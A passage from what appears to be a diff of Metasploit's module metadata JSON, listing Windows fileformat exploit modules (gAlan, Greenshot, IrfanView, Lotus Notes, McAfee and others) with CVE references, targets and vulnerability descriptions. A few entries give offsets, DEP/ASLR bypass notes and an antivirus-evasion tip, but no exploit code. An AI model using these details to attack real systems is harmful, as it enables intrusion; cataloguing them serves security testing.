Overflow", + "fullname": "exploit/windows/fileformat/galan_fileformat_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-12-07", + "type": "exploit", + "author": [ + "Jeremy Brown <0xjbrown41@gmail.com>", + "loneferret" + ], + "description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n by creating a specially crafted galan file.", + "references": [ + "OSVDB-60897", + "EDB-10339" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/galan_fileformat_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/greenshot_deserialize_cve_2023_34634": { + "name": "Greenshot .NET Deserialization Fileformat Exploit", + "fullname": "exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-07-26", + "type": "exploit", + "author": [ + "p4r4bellum", + "bwatters-r7" + ], + "description": "There exists a .NET deserialization vulnerability in Greenshot version 1.3.274\n and below. The deserialization allows the execution of commands when a user opens\n a Greenshot file. The commands execute under the same permissions as the Greenshot\n service. Typically, is the logged in user.", + "references": [ + "CVE-2023-34634", + "EDB-51633" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-08-17 08:48:42 +0000", + "path": "/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/greenshot_deserialize_cve_2023_34634", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/gsm_sim": { + "name": "GSM SIM Editor 5.15 Buffer Overflow", + "fullname": "exploit/windows/fileformat/gsm_sim", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-07", + "type": "exploit", + "author": [ + "Ruben Alejandro", + "chap0 ", + "Lincoln " + ], + "description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.", + "references": [ + "CVE-2015-1171", + "OSVDB-81161", + "EDB-14258" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/gsm_sim.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/gsm_sim", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/gta_samp": { + "name": "GTA SA-MP server.cfg Buffer Overflow", + "fullname": "exploit/windows/fileformat/gta_samp", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-18", + "type": "exploit", + "author": [ + "Silent_Dream" + ], + "description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n This buffer overflow occurs when the application attempts to open a malformed\n server.cfg file. To exploit this vulnerability, an attacker must send the\n victim a server.cfg file and have them run samp-server.exe.", + "references": [ + "OSVDB-83433", + "EDB-17893" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "GTA SA-MP (samp-server) v0.3.1.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/gta_samp.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/gta_samp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/hhw_hhp_compiledfile_bof": { + "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/hhw_hhp_compiledfile_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-02-06", + "type": "exploit", + "author": [ + "bratax", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n By creating a specially crafted hhp file, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2006-0564", + "OSVDB-22941", + "EDB-1488", + "EDB-1490" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/hhw_hhp_contentfile_bof": { + "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/hhw_hhp_contentfile_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-02-06", + "type": "exploit", + "author": [ + "bratax", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", + "references": [ + "CVE-2006-0564", + "OSVDB-22941", + "EDB-1470", + "EDB-1495" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/hhw_hhp_indexfile_bof": { + "name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", + "fullname": "exploit/windows/fileformat/hhw_hhp_indexfile_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-17", + "type": "exploit", + "author": [ + "Encrypt3d.M!nd", + "loneferret", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.", + "references": [ + "CVE-2009-0133", + "BID-33189", + "OSVDB-22941", + "EDB-10323", + "EDB-10335" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/homm3_h3m": { + "name": "Heroes of Might and Magic III .h3m Map file Buffer Overflow", + "fullname": "exploit/windows/fileformat/homm3_h3m", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-07-29", + "type": "exploit", + "author": [ + "Pierre Lindblad", + "John AAkerblom" + ], + "description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n Heroes of Might and Magic III. Once the map is started in-game, a\n buffer overflow occurring when loading object sprite names leads to\n shellcode execution.", + "references": [ + "EDB-37716" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]", + "HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]", + "Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/fileformat/homm3_h3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/homm3_h3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ht_mp3player_ht3_bof": { + "name": "HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/ht_mp3player_ht3_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-06-29", + "type": "exploit", + "author": [ + "hack4love ", + "His0k4", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HT-MP3Player 1.0.\n Arbitrary code execution could occur when parsing a specially crafted\n .HT3 file.\n\n NOTE: The player installation does not register the file type to be\n handled. Therefore, a user must take extra steps to load this file.", + "references": [ + "CVE-2009-2485", + "OSVDB-55449", + "EDB-9034", + "EDB-9038" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HT-MP3Player 1.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ht_mp3player_ht3_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ibm_forms_viewer_fontname": { + "name": "IBM Forms Viewer Unicode Buffer Overflow", + "fullname": "exploit/windows/fileformat/ibm_forms_viewer_fontname", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-05", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability\n is due to a dangerous usage of a strcpy-like function, and occurs while parsing malformed\n XFDL files containing a long fontname value. This module has been tested successfully on IBM\n Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2013-5447", + "OSVDB-100732", + "ZDI-13-274", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21657500" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ibm_forms_viewer_fontname", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ibm_pcm_ws": { + "name": "IBM Personal Communications iSeries Access WorkStation 5.9 Profile", + "fullname": "exploit/windows/fileformat/ibm_pcm_ws", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-02-28", + "type": "exploit", + "author": [ + "TecR0c " + ], + "description": "The IBM Personal Communications I-Series application WorkStation is susceptible to a\n stack-based buffer overflow vulnerability within file parsing in which data copied to a\n location in memory exceeds the size of the reserved destination area. The buffer is located\n on the runtime program stack.\n\n When the WorkStation file is opened it will reach the code path at 0x67575180 located in\n pcspref.dll which conducts string manipulation and validation on the data supplied in the\n WorkStation file. The application will first check if 'Profile' header exists and appends\n a dot with the next parameter within the file. It will then measure the character length\n of the header by calling strcspn with a dot as its null-terminated character.\n\n It will then write the header into memory and ensure the header ends with a NUL character.\n The parameter character array is passed to the strcpy() function. The application has\n declared a 52-element character array for the destination for strcpy function. The\n function does not perform bounds checking therefore, data can be written paste the end of\n the buffer variable resulting in corruption of adjacent variables including other local\n variables, program state information and function arguments. You will notice that the\n saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.\n\n To ensure we can perform arbitrary code execution we must we provide a valid pointer at\n 0x74 which is used as an argument for the called function at 0x675751ED as an id file\n extension parameter. Once the caller regains control we will reach our RETURN. The Ret\n instruction will be used to pop the overwritten saved return address which was corrupted.\n\n This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.\n\n Versions tested:\n IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a\n Which bundles pcsws.exe version 5090.27271.709\n\n Tested on:\n Microsoft Windows XP [Version 5.1.2600]\n Microsoft Windows Vista [Version 6.0.6002]\n Microsoft Windows 7 [Version 6.1.7600]", + "references": [ + "CVE-2012-0201", + "OSVDB-79657", + "URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM WorkStation 5.9 (Windows XP SP3)", + "IBM WorkStation 5.9 (Windows 7, Windows Vista)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ibm_pcm_ws.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ibm_pcm_ws", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/icofx_bof": { + "name": "IcoFX Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/icofx_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-10", + "type": "exploit", + "author": [ + "Marcos Accossatto", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of IcoFX. The vulnerability exists while parsing .ICO files, where a specially\n crafted ICONDIR header providing an arbitrary long number of images in the file\n can be used to trigger the overflow when reading the ICONDIRENTRY structures.", + "references": [ + "CVE-2013-4988", + "OSVDB-100826", + "BID-64221", + "EDB-30208", + "URL-http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IcoFX 2.5 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/icofx_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/icofx_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ideal_migration_ipj": { + "name": "PointDev IDEAL Migration Buffer Overflow", + "fullname": "exploit/windows/fileformat/ideal_migration_ipj", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-05", + "type": "exploit", + "author": [ + "Dr_IDE", + "dookie", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in versions v9.7\n through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n IDEAL Migration. All versions are suspected to be vulnerable.\n By creating a specially crafted ipj file, an attacker may be able\n to execute arbitrary code.\n\n NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH", + "references": [ + "CVE-2009-4265", + "OSVDB-60681", + "EDB-10319", + "EDB-12403", + "EDB-12404", + "EDB-12540" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IDEAL Migration <= 4.5.1 on Windows XP", + "IDEAL Administration <= 10.5 on Windows XP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ideal_migration_ipj", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/iftp_schedule_bof": { + "name": "i-FTP Schedule Buffer Overflow", + "fullname": "exploit/windows/fileformat/iftp_schedule_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-06", + "type": "exploit", + "author": [ + "metacom", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n By persuading the victim to place a specially-crafted Schedule.xml file\n in the i-FTP folder, a remote attacker could execute arbitrary code on\n the system or cause the application to crash. This module has been\n tested successfully on Windows XP SP3.", + "references": [ + "EDB-35177", + "OSVDB-114279" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/iftp_schedule_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/irfanview_jpeg2000_bof": { + "name": "Irfanview JPEG2000 jp2 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/irfanview_jpeg2000_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-16", + "type": "exploit", + "author": [ + "Parvez Anwar ", + "mr_me ", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. An egg hunter\n is used for stability.", + "references": [ + "CVE-2012-0897", + "OSVDB-78333", + "BID-51426", + "URL-http://www.greyhathacker.net/?p=525" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Irfanview 4.32 / Plugins 4.32 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/irfanview_jpeg2000_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ispvm_xcf_ispxcf": { + "name": "Lattice Semiconductor ispVM System XCF File Handling Overflow", + "fullname": "exploit/windows/fileformat/ispvm_xcf_ispxcf", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-16", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way\n ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n crafted file, when a long value is supplied for the version attribute of the ispXCF\n tag. It results in arbitrary code execution under the context of the user.", + "references": [ + "OSVDB-82000", + "BID-53562", + "URL-http://web.archive.org/web/20121014002756/http://secunia.com/advisories/48740/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ispvm_xcf_ispxcf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/kingview_kingmess_kvl": { + "name": "KingView Log File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/kingview_kingmess_kvl", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-20", + "type": "exploit", + "author": [ + "Lucas Apa", + "Carlos Mario Penagos Hollman", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in KingView <= 6.55. It exists in\n the KingMess.exe application when handling log files, due to the insecure usage of\n sprintf. This module uses a malformed .kvl file which must be opened by the victim\n via the KingMess.exe application, through the 'Browse Log Files' option. The module\n has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over\n Windows XP SP3.", + "references": [ + "CVE-2012-4711", + "OSVDB-89690", + "BID-57909", + "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/kingview_kingmess_kvl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/lattice_pac_bof": { + "name": "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow", + "fullname": "exploit/windows/fileformat/lattice_pac_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-16", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer\n 6.21. As a .pac file, when supplying a long string of data to the 'value' field\n under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption\n on the stack, which results in arbitrary code execution under the context of the\n user.", + "references": [ + "CVE-2012-2915", + "OSVDB-82001", + "EDB-19006", + "BID-53566", + "URL-http://web.archive.org/web/20120523175252/http://secunia.com:80/advisories/48741" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PAC-Designer 6.21 on Windows XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/lattice_pac_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/lattice_pac_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/lotusnotes_lzh": { + "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", + "fullname": "exploit/windows/fileformat/lotusnotes_lzh", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-05-24", + "type": "exploit", + "author": [ + "binaryhouse.net", + "alino <26alino@gmail.com>" + ], + "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net", + "references": [ + "CVE-2011-1213", + "OSVDB-72706", + "BID-48018", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", + "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", + "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/lotusnotes_lzh.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/lotusnotes_lzh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/magix_musikmaker_16_mmm": { + "name": "Magix Musik Maker 16 .mmm Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/magix_musikmaker_16_mmm", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-26", + "type": "exploit", + "author": [ + "acidgen", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n When opening a specially crafted arrangement file (.mmm) in the application, an\n unsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n might require up to several seconds to receive a shell.", + "references": [ + "OSVDB-72063", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/magix_musikmaker_16_mmm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mcafee_hercules_deletesnapshot": { + "name": "McAfee Remediation Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/mcafee_hercules_deletesnapshot", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-08-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When\n sending an overly long string to the DeleteSnapshot() method\n of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n This control is not marked safe for scripting, so choose your attack vector accordingly.", + "references": [ + "OSVDB-94540", + "EDB-16639" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mcafee_showreport_exec": { + "name": "McAfee SaaS MyCioScan ShowReport Remote Command Execution", + "fullname": "exploit/windows/fileformat/mcafee_showreport_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-12", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in McAfee Security-as-a-Service.\n The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails\n to check the FileName argument, and passes it on to a ShellExecuteW() function,\n therefore allows any malicious attacker to execute any process that's on the\n local system. However, if the victim machine is connected to a remote share\n (or something similar), then it's also possible to execute arbitrary code.\n Please note that a custom template is required for the payload, because the\n default Metasploit template is detectable by McAfee -- any Windows binary, such\n as calc.exe or notepad.exe, should bypass McAfee fine.", + "references": [ + "OSVDB-78310", + "BID-51397", + "ZDI-12-012" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Internet Explorer" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mcafee_showreport_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mediacoder_m3u": { + "name": "MediaCoder .M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/mediacoder_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-24", + "type": "exploit", + "author": [ + "metacom", + "modpr0be ", + "otoy " + ], + "description": "This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution under the context\n of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder\n runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539\n to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.", + "references": [ + "CVE-2017-8869", + "OSVDB-94522", + "EDB-26403" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mediacoder_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mediacoder_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mediajukebox": { + "name": "Media Jukebox 8.0.400 Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/mediajukebox", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-07-01", + "type": "exploit", + "author": [ + "Ron Henry ", + "dijital1" + ], + "description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.", + "references": [ + "OSVDB-55924", + "CVE-2009-2650" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 - English", + "Windows XP SP2 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mediajukebox.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mediajukebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/microp_mppl": { + "name": "MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/microp_mppl", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-08-23", + "type": "exploit", + "author": [ + "James Fitts " + ], + "description": "This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n buffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n which overwrites the lpFileName parameter of a CreateFileA() function, and results\n arbitrary code execution under the context of the user.", + "references": [ + "CVE-2010-5299", + "OSVDB-73627", + "EDB-14720" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Vista / 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/microp_mppl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/microp_mppl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 